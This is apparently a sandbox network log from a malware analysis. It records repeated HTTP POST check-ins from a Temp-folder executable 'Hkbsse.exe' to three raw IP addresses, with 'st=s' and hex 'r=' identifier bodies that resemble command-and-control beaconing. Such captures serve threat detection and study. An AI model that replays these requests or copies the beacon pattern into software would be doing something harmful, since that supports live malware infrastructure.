Aug 27, 2024 14:19:38.959023952 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	52243	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:39.645849943 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	52244	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:39.647183895 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	52245	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:39.910759926 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:40.611368895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:40.612142086 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:40.895749092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	52246	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:41.003746033 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:41.721282959 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:41.722055912 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:42.016254902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	52247	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:41.257107019 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	52248	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:42.130640984 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:42.816400051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:42.817132950 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:43.099509954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	52249	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:42.973182917 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	52250	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:43.382126093 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	52253	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:43.536684990 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	52252	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:43.536686897 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:44.233797073 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	52251	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:43.536784887 CEST	314	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	52254	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:44.347651958 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:45.057466030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:45.058666945 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:45.299628019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	52255	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:45.270776987 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	52256	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:45.410207987 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:46.103482008 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:46.106496096 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:46.351480007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	52257	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:46.472902060 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:47.163496017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:47.164454937 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:47.400667906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	52258	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:46.931158066 CEST	317	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	52259	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:47.530445099 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:48.213974953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 27, 2024 14:19:48.227013111 CEST	317	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Aug 27, 2024 14:19:48.461860895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	52260	185.209.162.226	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:47.660952091 CEST	159	OUT	POST /hb9IvshS03/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.209.162.226 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	52261	89.23.103.42	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:47.662410021 CEST	156	OUT	POST /hb9IvshS02/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 89.23.103.42 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	52262	185.208.158.116	80	7108	C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 14:19:48.582786083 CEST	159	OUT	POST /hb9IvshS01/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.208.158.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 27, 2024 14:19:49.278860092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Tue, 27 Aug 2024 12:19:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
